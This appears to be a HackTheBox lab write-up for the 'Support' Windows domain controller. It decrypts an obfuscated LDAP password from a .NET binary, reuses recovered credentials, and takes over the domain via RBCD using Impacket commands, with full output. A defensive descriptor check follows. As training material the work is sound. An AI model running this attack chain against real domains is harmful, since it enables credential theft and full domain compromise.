# HTB — Support

Tags: AD, Easy, Windows

Custom .NET info collector binary contains obfuscated LDAP password. GenericAll on DC via Resource-Based Constrained Delegation for Domain Admin.

January 23, 2025 · HackTheBox

#AD #RBCD #BloodHound #Kerberos
## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.174
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-23 22:09 EST
Nmap scan report for 10.10.11.174
Host is up (0.022s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-24 03:13:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49712/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 1m38s
| smb2-time:
|   date: 2025-01-24T03:14:07
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   19.20 ms 10.10.14.1
2   19.27 ms 10.10.11.174

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.96 seconds
```
## 445

```sh
445/tcp open microsoft-ds?
```

```sh
smbclient -N -L \\\\10.10.11.174 -U ''

Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

```sh
smbclient -L \\\\10.10.11.174 -U 'guest'
Password for [WORKGROUP\guest]:

Sharename     Type Comment
---------     ---- -------
ADMIN$        Disk Remote Admin
C$            Disk Default share
IPC$          IPC  Remote IPC
NETLOGON      Disk Logon server share
support-tools Disk support staff tools
SYSVOL        Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

## support-tools share
```sh
smbclient \\\\10.10.11.174\\support-tools -U 'Guest'
Password for [WORKGROUP\Guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe   A 44398000  Sat May 28 07:19:43 2022
```

```sh
smb: \> mask ""
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *UserInfo.exe
```
- pass this binary to dnSpy to analyze

## decrypt

```python
import base64

def xor_decrypt(data, key):
    """XOR each byte of data with the repeating key and the constant 0xDF (223),
    mirroring the obfuscation routine recovered from UserInfo.exe, and return the result."""
    return bytes([data[i] ^ key[i % len(key)] ^ 223 for i in range(len(data))])

# Base64 encoded string recovered from the binary
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"

# Convert from Base64
decoded_data = base64.b64decode(enc_password)

# Key for XOR decryption ("armando" in ASCII)
key = bytearray("armando", 'ascii')

# XOR decrypt
decrypted_data = xor_decrypt(decoded_data, key)

# Convert to string and display the result
decrypted_password = decrypted_data.decode('utf-8', errors='ignore')
print("Decrypted password:", decrypted_password)
```

```sh
python3 decrypt.py
Decrypted password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
```
```sh
wine UserInfo.exe
Usage: UserInfo.exe [options] [commands]
Options:
  -v|--verbose  Verbose output
Commands:
  find          Find a user
  user          Get information about a user
```

```sh
./UserInfo.exe
Usage: UserInfo.exe [options] [commands]
Options:
  -v|--verbose  Verbose output
Commands:
  find          Find a user
  user          Get information about a user
```

## wireshark

- add to `/etc/hosts`:

```sh
10.10.11.174 support.htb
```

```sh
./UserInfo.exe find -first test
[-] Exception: No Such Object
```

## creds

ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

```sh
nxc smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
SMB  10.10.11.174  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.174  445  DC  [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
```

```sh
nxc winrm 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
WINRM  10.10.11.174  5985  DC  [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM  10.10.11.174  5985  DC  [-] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
```

## users
```sh
nxc smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --users
SMB  10.10.11.174  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.174  445  DC  [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
SMB  10.10.11.174  445  DC  -Username-          -Last PW Set-        -BadPW-  -Description-
SMB  10.10.11.174  445  DC  Administrator       2022-07-19 17:55:56  0        Built-in account for administering the computer/domain
SMB  10.10.11.174  445  DC  Guest               2022-05-28 11:18:55  0        Built-in account for guest access to the computer/domain
SMB  10.10.11.174  445  DC  krbtgt              2022-05-28 11:03:43  0        Key Distribution Center Service Account
SMB  10.10.11.174  445  DC  ldap                2022-05-28 11:11:46  0
SMB  10.10.11.174  445  DC  support             2022-05-28 11:12:00  4
SMB  10.10.11.174  445  DC  smith.rosario       2022-05-28 11:12:19  0
SMB  10.10.11.174  445  DC  hernandez.stanley   2022-05-28 11:12:34  0
SMB  10.10.11.174  445  DC  wilson.shelby       2022-05-28 11:12:50  0
SMB  10.10.11.174  445  DC  anderson.damian     2022-05-28 11:13:05  0
SMB  10.10.11.174  445  DC  thomas.raphael      2022-05-28 11:13:21  0
SMB  10.10.11.174  445  DC  levine.leopoldo     2022-05-28 11:13:37  0
SMB  10.10.11.174  445  DC  raven.clifton       2022-05-28 11:13:53  0
SMB  10.10.11.174  445  DC  bardot.mary         2022-05-28 11:14:08  0
SMB  10.10.11.174  445  DC  cromwell.gerard     2022-05-28 11:14:24  0
SMB  10.10.11.174  445  DC  monroe.david        2022-05-28 11:14:39  0
SMB  10.10.11.174  445  DC  west.laura          2022-05-28 11:14:55  0
SMB  10.10.11.174  445  DC  langley.lucy        2022-05-28 11:15:10  0
SMB  10.10.11.174  445  DC  daughtler.mabel     2022-05-28 11:15:26  0
SMB  10.10.11.174  445  DC  stoll.rachelle      2022-05-28 11:15:42  0
SMB  10.10.11.174  445  DC  ford.victoria       2022-05-28 11:15:58  0
SMB  10.10.11.174  445  DC  [*] Enumerated 20 local users: SUPPORT
```

```txt
Administrator
ldap
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria
```

## bloodhound
```sh
bloodhound-python -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -ns 10.10.11.174 -d support.htb -c all
zip -r support.zip *.json
```

## ldapsearch

```sh
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
```

## creds
```sh
nxc smb 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'
SMB  10.10.11.174  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.174  445  DC  [+] support.htb\support:Ironside47pleasure40Watchful
```

```sh
nxc winrm 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'
WINRM  10.10.11.174  5985  DC  [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM  10.10.11.174  5985  DC  [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)
```

## user.txt
```sh
*Evil-WinRM* PS C:\Users\support\Desktop> cat user.txt
5877732d...
```

## privilege escalation

### Shared Support Account
```sh
*Evil-WinRM* PS C:\users\support> net user support
User name                    support
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/28/2022 3:12:00 AM
Password expires             Never
Password changeable          5/29/2022 3:12:00 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/24/2025 10:17:53 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Shared Support Accoun*Domain Users
The command completed successfully.
```

```sh
*Evil-WinRM* PS C:\users\support> net groups "Shared Support Accounts" /domain
Group name     Shared Support Accounts
Comment

Members

-------------------------------------------------------------------------------
support
The command completed successfully.
```

### Resource-Based Constrained Delegation
```sh
addcomputer.py -dc-ip 10.10.11.174 -computer-name 'TestPC' -computer-pass 'Password123!' 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account TestPC$ with password Password123!.
```

```sh
rbcd.py -dc-ip 10.10.11.174 -delegate-from 'TestPC$' -delegate-to 'DC$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] TestPC$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     TestPC$   (S-1-5-21-1677581083-3380853377-188903654-5601)
```

```sh
getST.py -spn 'cifs/dc.support.htb' 'support.htb/TestPC$:Password123!' -impersonate 'Administrator' -dc-ip 10.10.11.174
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
```
```sh
impacket-psexec support.htb/Administrator@dc.support.htb -k -no-pass -target-ip 10.10.11.174
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.10.11.174.....
[*] Found writable share ADMIN$
[*] Uploading file YcaMgUYV.exe
[*] Opening SVCManager on 10.10.11.174.....
[*] Creating service vIQP on 10.10.11.174.....
[*] Starting service vIQP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

## root.txt
```sh
C:\Users\Administrator\Desktop> type root.txt
ec8c5095...
```
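The RBCD step above works because `rbcd.py` writes a security descriptor into `msDS-AllowedToActOnBehalfOfOtherIdentity` on `DC$`. The following is an added defender-side check, not code from this writeup or from Impacket: it parses that attribute's binary security descriptor and reports any SID allowed to act on behalf of the DC that is not on an approved list. The descriptor is constructed inline for the example (using the `TestPC$` SID printed by `rbcd.py` above); reading the live value from LDAP and base64-decoding it is assumed.

```python
import struct

# Constructed sample: the TestPC$ SID that rbcd.py reported as allowed to act on behalf of DC$.
TESTPC_SID = "S-1-5-21-1677581083-3380853377-188903654-5601"

def build_sid(sid_str):
    """Encode a textual SID ("S-1-5-21-...") into its binary form (6-byte big-endian authority, LE sub-authorities)."""
    rev, auth, *subs = (int(p) for p in sid_str.split("-")[1:])
    return struct.pack("<BB", rev, len(subs)) + auth.to_bytes(6, "big") + b"".join(struct.pack("<I", s) for s in subs)

def parse_sid(buf, off):
    """Decode the binary SID at offset off; returns (text form, encoded length)."""
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in subs), 8 + 4 * count

def build_rbcd_descriptor(sid_strs):
    """Constructed self-relative security descriptor with one ACCESS_ALLOWED_ACE per SID:
    the same shape rbcd.py stores in msDS-AllowedToActOnBehalfOfOtherIdentity."""
    aces = b""
    for s in sid_strs:
        sid = build_sid(s)
        aces += struct.pack("<BBHI", 0x00, 0x00, 8 + len(sid), 0x000F01FF) + sid  # ACE header, full-control mask, SID
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sid_strs), 0) + aces  # ACL_REVISION_DS, size, ACE count
    header = struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20)  # SE_SELF_RELATIVE | SE_DACL_PRESENT, DACL at offset 20
    return header + acl

def allowed_to_act(sd):
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the DACL of a msDS-AllowedToActOnBehalfOfOtherIdentity value."""
    if len(sd) < 20:
        return []
    rev, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x0004 or dacl_off == 0:  # no DACL present: nothing is allowed
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, off)
        if ace_type == 0x00:  # ACCESS_ALLOWED_ACE_TYPE
            sids.append(parse_sid(sd, off + 8)[0])
        off += ace_size  # ace_size lets us skip ACE types we do not interpret
    return sids

def unexpected_delegations(sd, approved):
    """SIDs allowed to act on behalf of this account that are not approved; on a DC this list should be empty."""
    return [s for s in allowed_to_act(sd) if s not in approved]

if __name__ == "__main__":
    sd = build_rbcd_descriptor([TESTPC_SID])
    print(unexpected_delegations(sd, approved=set()))  # the freshly added computer account shows up here
```

On a real domain, pair this with a check of `ms-DS-MachineAccountQuota`, since the `addcomputer.py` step only works when ordinary users may still create machine accounts.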